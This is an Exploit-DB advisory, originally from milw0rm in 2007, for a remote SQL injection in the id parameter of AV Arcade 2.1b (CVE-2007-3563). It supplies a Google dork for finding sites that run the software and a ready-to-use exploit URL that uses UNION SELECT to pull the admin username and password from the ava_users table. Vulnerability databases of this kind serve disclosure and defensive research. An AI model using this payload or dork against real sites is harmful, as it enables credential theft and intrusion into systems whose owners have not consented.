AV Arcade 2.1b index.php id Remote SQL Injection Vulnerability

2007-07-02T00:00:00
ID EDB-ID:4138
Type exploitdb
Reporter Kw3[R]Ln
Modified 2007-07-02T00:00:00

Description

AV Arcade 2.1b (index.php id) Remote SQL Injection Vulnerability. CVE-2007-3563. Webapps exploit for php platform

                                        
                                            Web: AV Arcade 2.1b
Site : www.avscripts.net
Dork : "Powered By AV Arcade"

Author: Kw3rLn [ teh_lost_byte[at]YaHoO[d0t]Com ]
Romanian Security Team [Ethical Hacking] - hTTp://RSTZONE.nET


Description: SQL injection in $id of includes/view_page.php

Exploit:
/index.php?task=view_page&id=-1%20UNION%20SELECT%201,username,password%20FROM%20ava_users%20WHERE%20id=1

GREETZ: all memberz of RST and milw0rm
//kw3rln [ http://rstzone.net ]

# milw0rm.com [2007-07-02]